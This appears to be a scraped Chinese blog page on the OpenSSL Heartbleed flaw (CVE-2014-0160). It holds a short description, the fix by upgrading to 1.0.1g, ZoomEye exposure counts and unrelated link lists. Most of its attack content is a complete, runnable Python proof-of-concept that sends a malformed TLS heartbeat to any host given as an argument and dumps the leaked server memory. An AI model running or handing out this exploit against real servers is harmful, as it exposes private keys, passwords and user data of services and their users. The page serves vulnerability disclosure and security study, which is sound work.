在 heartbleed 的官网上有关于 CVE-2014-0160 漏洞的详细信息,这是关于 OpenSSL 的信息泄漏漏洞导致的安全问题。改 Heartbleed bug 可以让互联网的任何人读取系统保护内存,这种妥协密钥用于识别服务提供者和加密流量,用户名和密码的和实际的内容。该漏洞允许攻击者窃听通讯,并通过模拟服务提供者和用户来直接从服务提供者盗取数据。

目前该问题的解决可以通过升级到 OpenSSL 1.0.1g 版本。

Exploit:

openssl.py

 #!/usr/bin/python

 # Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)

 # The author disclaims copyright to this source code.

 import sys

 import struct

 import socket

 import time

 import select

 import re

 from optparse import OptionParser

 options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')

 options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')

 def h2bin(x):

     return x.replace(' ', '').replace('\n', '').decode('hex')

 hello = h2bin('''

 16 03 02 00  dc 01 00 00 d8 03 02 53

 43 5b 90 9d 9b 72 0b bc  0c bc 2b 92 a8 48 97 cf

 bd 39 04 cc 16 0a 85 03  90 9f 77 04 33 d4 de 00

 00 66 c0 14 c0 0a c0 22  c0 21 00 39 00 38 00 88

 00 87 c0 0f c0 05 00 35  00 84 c0 12 c0 08 c0 1c

 c0 1b 00 16 00 13 c0 0d  c0 03 00 0a c0 13 c0 09

 c0 1f c0 1e 00 33 00 32  00 9a 00 99 00 45 00 44

 c0 0e c0 04 00 2f 00 96  00 41 c0 11 c0 07 c0 0c

 c0 02 00 05 00 04 00 15  00 12 00 09 00 14 00 11

 00 08 00 06 00 03 00 ff  01 00 00 49 00 0b 00 04

 03 00 01 02 00 0a 00 34  00 32 00 0e 00 0d 00 19

 00 0b 00 0c 00 18 00 09  00 0a 00 16 00 17 00 08

 00 06 00 07 00 14 00 15  00 04 00 05 00 12 00 13

 00 01 00 02 00 03 00 0f  00 10 00 11 00 23 00 00

 00 0f 00 01 01

 ''')

 hb = h2bin('''

 18 03 02 00 03

 01 40 00

 ''')

 def hexdump(s):

     for b in xrange(0, len(s), 16):

         lin = [c for c in s[b : b + 16]]

         hxdat = ' '.join('%02X' % ord(c) for c in lin)

         pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)

         print '  %04x: %-48s %s' % (b, hxdat, pdat)

     print

 def recvall(s, length, timeout=5):

     endtime = time.time() + timeout

     rdata = ''

     remain = length

     while remain > 0:

         rtime = endtime - time.time()

         if rtime < 0:

             return None

         r, w, e = select.select([s], [], [], 5)

         if s in r:

             data = s.recv(remain)

             # EOF?

             if not data:

                 return None

             rdata += data

             remain -= len(data)

     return rdata

 def recvmsg(s):

     hdr = recvall(s, 5)

     if hdr is None:

         print 'Unexpected EOF receiving record header - server closed connection'

         return None, None, None

     typ, ver, ln = struct.unpack('>BHH', hdr)

     pay = recvall(s, ln, 10)

     if pay is None:

         print 'Unexpected EOF receiving record payload - server closed connection'

         return None, None, None

     print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))

     return typ, ver, pay

 def hit_hb(s):

     s.send(hb)

     while True:

         typ, ver, pay = recvmsg(s)

         if typ is None:

             print 'No heartbeat response received, server likely not vulnerable'

             return False

         if typ == 24:

             print 'Received heartbeat response:'

             hexdump(pay)

             if len(pay) > 3:

                 print 'WARNING: server returned more data than it should - server is vulnerable!'

             else:

                 print 'Server processed malformed heartbeat, but did not return any extra data.'

             return True

         if typ == 21:

             print 'Received alert:'

             hexdump(pay)

             print 'Server returned error, likely not vulnerable'

             return False

 def main():

     opts, args = options.parse_args()

     if len(args) < 1:

         options.print_help()

         return

     s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

     print 'Connecting...'

     sys.stdout.flush()

     s.connect((args[0], opts.port))

     print 'Sending Client Hello...'

     sys.stdout.flush()

     s.send(hello)

     print 'Waiting for Server Hello...'

     sys.stdout.flush()

     while True:

         typ, ver, pay = recvmsg(s)

         if typ == None:

             print 'Server closed connection without sending Server Hello.'

             return

         # Look for server hello done message.

         if typ == 22 and ord(pay[0]) == 0x0E:

             break

     print 'Sending heartbeat request...'

     sys.stdout.flush()

     s.send(hb)

     hit_hb(s)

 if __name__ == '__main__':

     main()

来自ZoomEye的统计,全国443端口:1601250,有33303个受本次OpenSSL漏洞影响!

铁道部12306系统的漏洞被猪猪侠抢先了。结果我的被驳回了。详情见:

http://wooyun.org/bugs/wooyun-2014-055939

OpenSSL "heartbleed" 安全漏洞的更多相关文章

  1. OpenSSL重大漏洞-Heartbleed之漏洞利用脚本POC讲解

    OpenSSL Security Advisory [07 Apr 2014] ======================================== TLS heartbeat read ...

  2. OpenSSL Heartbleed “心脏滴血”漏洞简单攻击示例

    OpenSSL Heartbleed漏洞的公开和流行让许多人兴奋了一把,也让另一些人惊慌了一把. 单纯从攻击的角度讲,我已知道的,网上公开的扫描工具有: 1.  Nmap脚本ssl-heartblee ...

  3. OpenSSL Heartbleed "心脏滴血"漏洞简单攻击示例

    转自:http://www.lijiejie.com/openssl-heartbleed-attack/ OpenSSL Heartbleed漏洞的公开和流行让许多人兴奋了一把,也让另一些人惊慌了一 ...

  4. 升级OpenSSL修复高危漏洞Heartbleed

    升级OpenSSL修复高危漏洞Heartbleed 背景:          OpenSSL全称为Secure Socket Layer.是Netscape所研发.利用数据加密(Encryption) ...

  5. [漏洞复现] [Vulhub靶机] OpenSSL Heartbleed Vulnerability (CVE-2014-0160)

    免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责. 0x00 背景知识 传输层安全协议SSL 安全套接字协议SSL(Secure Sockets Layer),及其继任者传输层安 ...

  6. OpenSSL Heartbleed原因小结

    User发送心跳报文给Server,Server复制心跳报文的内容回应User. memcpy(bp, p1, payload); Server拷贝心跳报文的内容给Client时,如果拷贝的字节数目超 ...

  7. OpenSSL心脏出血漏洞全回顾

    近日网络安全界谈论的影响安全最大的问题就是Heartbleed漏洞,该漏洞是4月7号国外黑客曝光的.据Vox网站介绍,来自Codenomicon和谷歌安全部门的研究人员,发现OpenSSL的源代码中存 ...

  8. OpenSSL “心脏滴血”漏洞

    OpenSSL "心脏滴血"漏洞 漏洞描述 : OpenSSL软件存在"心脏出血"漏洞,该漏洞使攻击者能够从内存中读取多达64 KB的数据,造成信息泄露. 漏洞 ...

  9. 对OpenSSL心脏出血漏洞的试验

    1.安装OpenSSL环境 sudo apt-get install openssl sudo pip install pyopenssl(中间会提示ffi.h 没有那个文件或目录,sudo apt- ...

随机推荐

  1. 【正常向】CODEVS上分黄金

    白银上分黄金失败=.= 在之前有很认真的写了一波排序,所以排序并不是很怂,还是那个理,现阶段学习的都是比较简单的排序,都是所谓的冒泡排序啊,桶排序这类,至于插排和选择排序,再往后又是什么快拍就很尬了. ...

  2. BackgroundWorker的DoWork方法中发生异常无法传递到RunWorkedCompleted方法

    在使用C#的BackgroundWorker时需要在UI界面上显示DoWork中发生的异常,但怎么调试都无法跳转到界面上,异常也不会传递到RunWorkerCompleted方法中(e.Error为空 ...

  3. gsoap创建webservice服务简单教程

    版权声明:本文为博主原创文章,未经博主允许不得转载. 目录(?)[-] WebServicesoapgsoap 使用gsoap创建webservice服务 下载gsop 准备待导出的服务接口定义文件比 ...

  4. 实现sticky footer的五种方法

    2017-04-19 16:24:48 什么是sticky footer 如果页面内容不够长的时候,页脚块粘贴在视窗底部:如果内容足够长时,页脚块会被内容向下推送. 用position实现? 如果是用 ...

  5. 【2017-05-03】winform打印控件、事件对象和事件数据、MDI窗体容器

    一.打印控件 第一步先把打印对象搞出来. - printDocument    打印对象(将要打印的内容放到该对象里,从该对象里取内容打印) 设置他的PrintPage事件(对于要打印的每一页触发一次 ...

  6. Play再识 - 不放弃的执着

    从写Play初识时,前面各种称赞play如何如何解放java web开发,最后因为网络被墙而无法正常编译,从而想到放弃.从来都有成为web开发高手的想法,今天又再一次进行尝试,惊喜的是有新的进展. 首 ...

  7. Integer浅谈

    别BB,亮代码. 结果: 结果分析: 1.true 相信大家对第一个的比较结果应该不意外,只是单纯的数值比较 2.true 这个和第三个结果一比较起来就感觉迷惑了,明明两个都是同样的赋值方式,为什么一 ...

  8. 虚幻UE4中移动端水材质的设置

    内容: *概述 *纹理文件 *基本颜色 *法线的设置 *标量参数和材质属性 *场景设置 *最终效果 概述 本教程由52VR翻译自unrealengine官方,在本教程中,我们将教您如何创建可以在移动设 ...

  9. poj 1088 动态规划

    #include <iostream> #include <string.h> using namespace std; ][];//存储当前位置能得到的最优解 ][];//存 ...

  10. 开源库RxJava、ButterKnife学习记录

    1. 简介 RxJava "RxJava is a Java VM implementation of Reactive Extensions: a library for composin ...